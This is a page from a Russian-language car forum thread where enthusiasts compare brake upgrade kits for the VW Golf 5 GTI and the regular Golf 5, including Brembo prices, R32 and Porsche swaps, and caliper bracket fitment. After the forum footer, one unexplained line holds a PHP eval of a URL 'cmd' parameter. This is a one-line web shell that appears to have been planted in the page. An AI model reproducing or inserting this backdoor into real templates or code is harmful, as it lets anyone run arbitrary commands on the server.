+ Ответить в теме
Страница 2 из 17 ПерваяПервая 1 2 3 4 12 ... ПоследняяПоследняя
Показано с 11 по 20 из 164

Тема: Апгрейд тормозов на 5 GTI и обычном Golf5


  1. #11
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(Griffin &#064; Dec 25 2007, 12&#58;43) <{POST_SNAPBACK}></div><div class='quotemain'>А хрен его знает... Поглядим. Я ж не 100% заявляю, я говорю как есть и с чем столкнулись. Можт там переднюю подвеску под замену всю ))[/b][/quote]
    позвонил в Московское представительство Brembo http://www.brembo-brakes.ru/contacts.html

    ответ следуюший: для Golf V в комплект входит специальный алюминевый адаптер

    сушествует три варианта, один из них влазит только в 18 дюймовые колеса и два в 17-е

    те которые в 17-е различаются диском:

    подешевле (1460 Евро) с односостовным диском диаметром 330 мм и массой 8,5 кг + 5 кг суппорт + около 1 кг адаптер

    подороже (2595 Евро) - диск с алюминевой ступицей, диаметр диска 328 мм, масса 5,1 кг

  2. #12
    GTI-Racing crawl is on a distinguished road Аватар для crawl
    Регистрация
    13.09.2007
    Откуда
    MV, CA USA
    Машина
    Jetta 2.0T
    Сообщений
    141
    <div class='quotetop'>Цитата(Griffin &#064; Dec 25 2007, 03&#58;14) <{POST_SNAPBACK}></div><div class='quotemain'>Не совсем понятно как они собираются их крепить (но явно чтото придется колхозить, т.к. стандартный рычаг не позволит поставить диски большого размера. Но это их замуты - вообще надо смотреть как и что собираются делать. Пусть ставят, возможно кроме них и альтернативы то нет

    Вообще диски и машинки очень смахивают на TarOx-ы.
    ЗЫ: Самое главное, что забыл сказать - вся электроника работат как обычно, хорошо и правильно. Все прокачивается нормально, без проблем. Ну и если ктото говорит, что штатные тормоза лучше, а апгрейд делает только хуже, то видимо потому, что сам на стоковых ездит [/b][/quote]


    Я тебя могу заверить что существует с полдюжины Биг Браке Китов для MK5 и все они ставятся на родные части без каких бы то ни было проблем. Никакого колхоза не надо. Самый просто вариант это 345 миллиметровые тормоза от R32 (и самый дешевый в USA).
    Вот тут (Click&#33;) четко видно какие запчасти идут и что супорты встанут на место стандартных без проблем. Тут же есть R32 Big Brake Kit.
    Вот тут есть тоже варианты на тему тормозов от Porsche: http://www.ecstuning.com/stage/edpd/pagebu...ECS%20Stage%205

    Что касается стандартных MK5 (не GTI, роторы 288mm), то на них можно поставить роторы (тормозные диски) от GTI (312mm) поменяв ротор и скобу крепления тормозного цилиндра. Сам цилиндр идентичен (по крайне мере в Америке)

    Оч. бюджетно &#036;360 - за сверлённые или &#036;300 за простые роторы и скобу.


    Edit: Поздравляю с обновкой&#33;

  3. #13
    2 crawl Не прав, объясню почему
    На ГТИ/R32 китов хватает, никаких проблем нет, это да. На ГТИ элементарно встают тормоза от Р32, опять же.

    Но речь про обычный Мк5. Я сам лично вчера смотрел как сделан рычаг на машине 2008 года - скоба идет вместе с поворотным кулаком - открутить и заменить ее невозможно, т.к. это единое целое. Возможно на предыдущих модельниках было иначе (в чем я сильно сомневаюсь, но не утверждаю, т.к. не проверял). На всех картинках отчетливо видна замена скобы, на 1.6 Максима, на который хотели поставить мои тормоза, никакой отвинчивающейся скобы небыло, в этом все дело. Поэтому любой из представленных на картинках китов, не может встать на его машину.

    ЗЫ: Сенькую&#33;

  4. #14
    GTI-Racing crawl is on a distinguished road Аватар для crawl
    Регистрация
    13.09.2007
    Откуда
    MV, CA USA
    Машина
    Jetta 2.0T
    Сообщений
    141
    <div class='quotetop'>Цитата(Griffin &#064; Dec 25 2007, 11&#58;03) <{POST_SNAPBACK}></div><div class='quotemain'>2 crawl Не прав, объясню почему
    На ГТИ/R32 китов хватает, никаких проблем нет, это да. На ГТИ элементарно встают тормоза от Р32, опять же.

    Но речь про обычный Мк5. Я сам лично вчера смотрел как сделан рычаг на машине 2008 года - скоба идет вместе с поворотным кулаком - открутить и заменить ее невозможно, т.к. это единое целое. Возможно на предыдущих модельниках было иначе (в чем я сильно сомневаюсь, но не утверждаю, т.к. не проверял). На всех картинках отчетливо видна замена скобы, на 1.6 Максима, на который хотели поставить мои тормоза, никакой отвинчивающейся скобы небыло, в этом все дело. Поэтому любой из представленных на картинках китов, не может встать на его машину.

    ЗЫ: Сенькую&#33;[/b][/quote]

    Хреново. На мою точно любой kit встанет, т.к. у меня скоба как на фотографии сделана и легко снимается (проверенно).

  5. #15
    надо прояснить этот вопрос.... я б не отказался себе с порша поставить

  6. #16
    http://www.bshspeedshop.com/store/product....=287&page=1 - вот эти диски над брать тормозные... если и есть что лучше их то есть небольшие шансы, что это ап ракинг

  7. #17
    GTI-Racing john@rallye is on a distinguished road Аватар для john@rallye
    Регистрация
    11.08.2006
    Откуда
    msk
    Машина
    lupo low&slow, mk1 cabrio сток, mk1 cabrio не сток
    Сообщений
    1,049
    <div class='quotetop'>Цитата(Griffin &#064; Dec 25 2007, 10&#58;41) <{POST_SNAPBACK}></div><div class='quotemain'>[/b][/quote]
    главное что цвет красный - остальное вторично
    fuckfueleconomy

  8. #18
    GTI-Racing chess is on a distinguished road Аватар для chess
    Регистрация
    29.11.2006
    Откуда
    москвабад
    Машина
    CTR ЕК9, MPS K90, vw polo 6r
    Сообщений
    1,603
    <div class='quotetop'>Цитата(john@rallye &#064; Dec 28 2007, 19&#58;17) <{POST_SNAPBACK}></div><div class='quotemain'>главное что цвет красный - остальное вторично [/b][/quote]
    это действительно похоже на классовую борьбу <_<
    каждому своё
    АДМ GTI mkV st1.5 - 2.01.084
    АДМ Civic Type-R EK9 - 1.57.683
    Смоленск Civic Type-R EK9 - 1.47.690
    Нижний Новгород Civic Type-R EK9 - 1.53.472
    Казань Civic Type-R EK9 - 1.43.187
    MRW Civic Type-R EK9 - 2.01.663

  9. #19
    GTI-Racing john@rallye is on a distinguished road Аватар для john@rallye
    Регистрация
    11.08.2006
    Откуда
    msk
    Машина
    lupo low&slow, mk1 cabrio сток, mk1 cabrio не сток
    Сообщений
    1,049
    <div class='quotetop'>Цитата(chess &#064; Dec 28 2007, 19&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>это действительно похоже на классовую борьбу <_<[/b][/quote]
    нет, просто не люблю "киты", тем более такие - расчитаные больше на внешний эффект (скажем так, напряг диск монолитный зато с дыркамЕ, ну и супорта тож тревожные какие-то, хотя всеравно луча чем штатная чугунина)...
    но ниинтиресна =&#092;
    fuckfueleconomy

  10. #20
    John, а ты не подскажешь куда можно обратится чтоб адаптировать тормозилки от Порша к G5 обычному ?

+ Ответить в теме
Страница 2 из 17 ПерваяПервая 1 2 3 4 12 ... ПоследняяПоследняя

Похожие темы

  1. Апгрейд тнвд и впуск K&N под К04
    от Cupman в разделе Тюнинг
    Ответов: 25
    Последнее сообщение: 03.10.2012, 00:22
  2. Продам апгрейд-комплект для тормозов 312 мм на Golf Mk4
    от svintuss в разделе Покупка и продажа запчастей
    Ответов: 4
    Последнее сообщение: 15.01.2012, 13:52
  3. Дсг Апгрейд От Hpa Motors - Наконец-то
    от Serzh в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 5
    Последнее сообщение: 12.03.2009, 21:56
  4. Апгрейд Впуска
    от Scruj в разделе Украина
    Ответов: 13
    Последнее сообщение: 16.09.2008, 20:19
  5. Приглядел себе апгрейд турбины
    от Griffin в разделе Курилка
    Ответов: 9
    Последнее сообщение: 10.01.2008, 13:03

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}